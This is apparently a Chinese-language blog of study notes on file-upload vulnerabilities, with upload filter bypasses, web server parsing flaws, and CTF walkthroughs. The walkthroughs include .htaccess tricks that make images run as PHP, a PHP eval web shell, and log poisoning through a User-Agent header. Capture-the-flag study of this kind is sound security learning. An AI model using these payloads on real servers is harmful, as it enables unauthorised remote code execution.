Web入门-文件上传
Web入门-文件上传
MIME类型
1 | .html:text/html |
黑名单绕过
1 | 后缀大小写绕过:.Php |
白名单绕过
1 | %00与0x00绕过:as.php%00.png |
常见文件幻数:
jpg:FF D8 FF E0 00 10 4A 46 49 46
git:47 49 46 38 39 61
Web解析漏洞
Apache解析漏洞
test.php.qwe.asd
IIS 6.0解析漏洞
目录解析:www.xxx.com/xx.asp/xx.jpg 默认.asp目录下文件解析成asp文件。
文件解析:www.xxx.com/xx.asp;.jpg 不解析;后面内容,被解析成asp文件。
IIS 7.0解析漏洞
任意文件名/任意文件名.php
Nginx解析漏洞
一种同上,另一种:任意文件名%00.php
做题
[SWPUCTF 2021 新生赛]easyupload3.0
上传文件“.htaccess”,内容为:
1 | <FilesMatch "1.jpg"> |
此时upload路由下匹配文件名“1.jpg”的文件将会被当作php解析。
再上传文件”1.jpg“,内容为:
1 | eval($_POST['a']); @ |
拿Antsword去连。
[GXYCTF 2019]BabyUpload
上传.htaccess,Content-Type改为image/jpeg:
1 | <FilesMatch "1.png"> |
更改同上,上传“1.png”文件:
1 | GIF89a |
拿Antsword连。
[HNCTF 2022 WEEK2]easy_include
1 |
|
用Wappalyzer检测到中间件Nginx,文件包含读:
1 | http://node5.anna.nssctf.cn:29413/?file=/var/log/nginx/access.log |
看到里面一堆UA头,就把马写在UA请求头上:
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0<?php @eval($_POST['cmd']);?> |
蚁剑连上去即可。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!